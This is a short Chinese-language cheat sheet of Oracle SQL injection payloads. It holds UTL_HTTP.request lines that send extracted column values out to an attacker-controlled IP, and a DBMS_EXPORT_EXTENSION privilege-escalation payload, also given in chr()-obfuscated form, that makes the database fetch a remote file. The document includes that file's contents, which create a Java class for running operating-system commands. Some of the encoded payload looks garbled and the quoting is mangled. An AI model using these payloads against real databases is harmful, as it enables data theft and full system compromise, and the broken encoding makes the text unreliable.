oracle注入方法(2)

爆字段值:
‘and UTL_HTTP.request(‘http://IP:2009/’(select 表段 from 表名 where rownum=1))=1–
‘and UTL_HTTP.request(‘http://IP:2009/’(select 表段 from 表名 where rownum=1 and 表段<>’第一个表段值’))=1–”
利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES函数 获取系统权限 :
‘and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,BAR’,DBMS_OUTPUT”.PUT(1); utl_http.request (‘http://www.xx.com/1.txt’) END;–’,SYS’,0,’1′,0)=0–
假如提交后返回该页无法显示。换成char() 形式后and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(39)chr(70)chr(79),chr(79)chr(39)chr(44),chr(39)chr(66)chr(65)chr(82)chr(39)chr(44)chr(39)chr(68)chr(66)chr(77)chr(883)chr(95)chr(79)chr(85)chr(84)chr(80)chr(85)chr(84)chr(40)chr(58)chr(80)chr(49)chr(41)chr(59)utl_http.request(chr(39)chr(104)chr(116)chr(116)chr(112)chr(58)chr(47)chr(47)chr(119)chr(119)chr(119)chr(46)chr(108)chr(105)chr(45)chr(116)chr(101)chr(107)chr(46)chr(99)chr(111)chr(109)chr(47)chr(49)chr(46)chr(116)chr(120)chr(116)chr(39))chr(69)chr(78)chr(68)chr(59)chr(45)chr(45)chr(39),chr(39)chr(83)chr(89)chr(83)chr(39),0,chr(39)chr(49)chr(39),0)=0–
远程地址的1.txt内容为 ：EXECUTE IMMEDIATE ‘DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ”CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED “JAVACMD” AS import java.lang.*;import java.io.*;public class JAVACMD{public static void execCommand (String command) throws IOException {Runtime.getRuntime().exec(command);}};”;END;’